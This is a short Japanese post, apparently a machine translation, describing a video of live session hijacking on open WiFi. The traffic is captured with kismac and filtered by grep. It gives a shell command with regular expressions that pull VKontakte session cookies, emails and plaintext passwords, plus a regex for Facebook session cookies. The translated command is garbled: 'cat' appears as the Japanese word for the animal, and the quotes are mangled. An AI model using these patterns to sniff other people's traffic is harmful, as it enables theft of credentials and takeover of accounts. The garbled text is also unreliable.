オープンなWiFiネットワークでのリアルタイムCookieインターセプト

このビデオは、VKontakte.ruでのセッションのハイジャックを示しています。これは、何らかの理由でhttpsによる認証をまだ使用せず、プレーンテキストでパスワードを転送します。

トラフィックダンプは、libpcap形式でkismacプログラムによって収集され、正規表現を使用してgrepによって同時に解析されます。これにより、対象のすべてのCookieとパスワードをリアルタイムで表示できます。 パケットアナライザーは使用されません。



vkontakte.ruをインターセプトする正規表現：



tail -F pcap.file | 猫| grep -aEo“ remixsid = [0-9a-f] + | l = [0-9] {3,12} | p = [0-9a-f] {36} | email = [^＆] +＆pass = [^] +»



Facebookの場合：



c_user = [0-9] + | sid = [0-9] {1,5} | xs = [0-9a-f] {32}



同様の設計は、airdump-ngを使用して組み立てられたダンプで機能します。